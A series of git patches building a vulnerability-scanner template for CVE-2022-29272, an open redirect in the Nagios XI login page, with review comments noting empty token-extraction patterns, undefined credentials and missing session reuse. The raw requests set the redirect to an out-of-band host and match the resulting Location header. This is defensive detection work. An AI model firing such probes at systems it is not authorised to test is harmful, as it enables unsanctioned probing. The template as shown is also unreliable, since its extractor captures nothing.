From 4e99cf1fd63bdcea7266ecc3471f70392317a78f Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 16 Aug 2022 21:44:18 +0530
Subject: [PATCH 1/4] Create CVE-2022-29272.yaml
---
cves/2022/CVE-2022-29272.yaml | 47 +++++++++++++++++++++++++++++++++++
1 file changed, 47 insertions(+)
create mode 100644 cves/2022/CVE-2022-29272.yaml
diff --git a/cves/2022/CVE-2022-29272.yaml b/cves/2022/CVE-2022-29272.yaml
new file mode 100644
index 0000000000..696407535f
--- /dev/null
+++ b/cves/2022/CVE-2022-29272.yaml
@@ -0,0 +1,47 @@
+id: CVE-2022-29272
+
+info:
+ name: Nagios XI < 5.8.5 - Open Redirect
+ author: ritikchaddha
+ severity: medium
+ description: |
+ In Nagios XI through 5.8.5, an open redirect vulnerability exists in the login function that could lead to spoofing.
+ reference:
+ - https://github.com/sT0wn-nl/CVEs/tree/master/CVE-2022-29272
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-29272
+ classification:
+ cve-id: CVE-2022-29272
+ tags: cve,cve2022,redirect,nagios
+
+requests:
+ - raw:
+ - |
+ GET /nagiosxi/login.php HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
+
+ - |
+ POST /nagiosxi/login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
+
+ nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.example.com&username={{username}}&password={{password}}&loginButton=Login
+
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+ extractors:
+ - type: regex
+ part: body
+ name: nsp_token
+ group: 1
+ regex:
+ - ''
+ - ""
+ internal: true
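Review bot: The `nsp_token` extractor at the end of this hunk lists two empty patterns (`''` and `""`) with `group: 1`, so as shown there is no capture group to fill and `{{nsp_token}}` in the POST body would resolve to nothing. The original patterns may have been lost when this page was rendered, so check them against the file. If they really are empty, replace them with a single expression that captures the value of the login form's `nsp` field. The same empty patterns are still present in the last hunk of patch 4/4. Separately, `name` says `< 5.8.5` while `description` says `through 5.8.5`; the name should read `Nagios XI <= 5.8.5 - Open Redirect` to agree with the description.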
From 7c5967828b4a5f25d687b4332ac3c1e31b2ad8d2 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 20 Aug 2022 12:28:45 +0530
Subject: [PATCH 2/4] Update CVE-2022-29272.yaml
---
cves/2022/CVE-2022-29272.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-29272.yaml b/cves/2022/CVE-2022-29272.yaml
index 696407535f..a282f8cf52 100644
--- a/cves/2022/CVE-2022-29272.yaml
+++ b/cves/2022/CVE-2022-29272.yaml
@@ -26,7 +26,7 @@ requests:
Content-Type: application/x-www-form-urlencoded
Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
- nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.example.com&username={{username}}&password={{password}}&loginButton=Login
+ nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login
redirects: true
max-redirects: 2
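Review bot: The POST body on the changed line depends on `{{username}}` and `{{password}}`, which nothing in the template defines or documents, so a scan that does not supply them cannot send the login request as intended. Add a sentence to `description` stating that valid Nagios XI credentials must be passed in as template variables. Also add `authenticated` to `tags` so the template can be excluded from unauthenticated scans. The request block starts and ends outside this hunk.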
From da868c0fb34effaad4183f4205e80aa91f6fb20a Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 20 Aug 2022 12:45:27 +0530
Subject: [PATCH 3/4] Update CVE-2022-29272.yaml
---
cves/2022/CVE-2022-29272.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-29272.yaml b/cves/2022/CVE-2022-29272.yaml
index a282f8cf52..9a7dd10d67 100644
--- a/cves/2022/CVE-2022-29272.yaml
+++ b/cves/2022/CVE-2022-29272.yaml
@@ -16,7 +16,7 @@ info:
requests:
- raw:
- |
- GET /nagiosxi/login.php HTTP/1.1
+ GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1
Host: {{Hostname}}
Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
From 8042eb160b3c5f4d315c67942435659e4562effb Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 21 Aug 2022 14:20:07 +0530
Subject: [PATCH 4/4] Update CVE-2022-29272.yaml
---
cves/2022/CVE-2022-29272.yaml | 6 ++----
1 file changed, 2 insertions(+), 4 deletions(-)
diff --git a/cves/2022/CVE-2022-29272.yaml b/cves/2022/CVE-2022-29272.yaml
index 9a7dd10d67..f2c888a6a1 100644
--- a/cves/2022/CVE-2022-29272.yaml
+++ b/cves/2022/CVE-2022-29272.yaml
@@ -11,20 +11,18 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2022-29272
classification:
cve-id: CVE-2022-29272
- tags: cve,cve2022,redirect,nagios
+ tags: cve,cve2022,redirect,nagios,nagiosxi
requests:
- raw:
- |
GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1
Host: {{Hostname}}
- Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- Cookie: nagiosxi=cvdde3p1b9gtr27pigi8l4fsb5
nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login
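Review bot: Nothing ties the GET that yields `nsp_token` to the POST that submits it once the fixed `Cookie: nagiosxi=...` headers are removed here, and no patch in this series sets `cookie-reuse: true`. If the token is bound to the session that issued it, which the earlier pinned cookie suggests, the login POST would be rejected and the matcher would never fire, giving a false negative on affected hosts. Add `cookie-reuse: true` alongside `redirects: true` at the request level so the session cookie from the first response is sent with the second request. Dropping the hard-coded session identifier is the right move in itself; the request block continues outside this hunk.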
@@ -41,7 +39,7 @@ requests:
part: body
name: nsp_token
group: 1
+ internal: true
regex:
- ''
- ""
- internal: true